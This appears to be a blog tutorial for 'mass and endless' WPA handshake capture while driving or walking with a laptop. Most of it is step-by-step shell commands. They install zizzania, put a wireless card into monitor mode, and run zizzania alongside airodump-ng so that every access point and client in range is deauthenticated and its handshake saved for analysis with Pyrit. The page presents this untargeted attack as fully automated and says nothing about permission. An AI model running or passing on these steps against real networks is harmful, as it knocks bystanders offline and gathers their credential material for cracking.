Mass and endless handshake capture from all Access Points in a range

If your task is automotive, endless and mass handshake capturing, zizzania will come in handy. Zizzania can be used as standalone application, but I prefer to combine it with Airodump-ng.

You can use this method while walking or driving a car with a laptop. The process is completely automated. It does not require your attention at all. Zizzania will perform deauthentication attack against every discovered AP and clients. Airodump-ng will save handshakes.

Zizzania follows channels if another program switch them. Airodump-ng is able to switch channels but does it too fast. So you should adjust -f option (time in ms between hopping channels).

If you do not have zizzania yet, install it:

sudo apt-get install scons libpcap-dev uthash-dev
git clone https://github.com/cyrus-and/zizzania.git
cd zizzania/
make
sudo make install

Shut Network Manager down:

sudo systemctl stop NetworkManager

Put you wireless interface in Monitor mode:

sudo ip link set wlan0 down
sudo iw wlan0 set monitor none
sudo ip link set wlan0 up

Now you are ready! Open two terminal windows and in the first one type:

sudo airodump-ng wlan0 -f 30000 -w auto1

In the second one issure:

sudo zizzania -i wlan0

Wait for a while (20+ minutes). If you are moving, do not move too fast, the programs need time to work through all channels.

To analyze the capture file you can use Pyrit:

pyrit -r "auto1-02.cap" analyze

Recommended for you:

Leave a Reply

Your email address will not be published. Required fields are marked *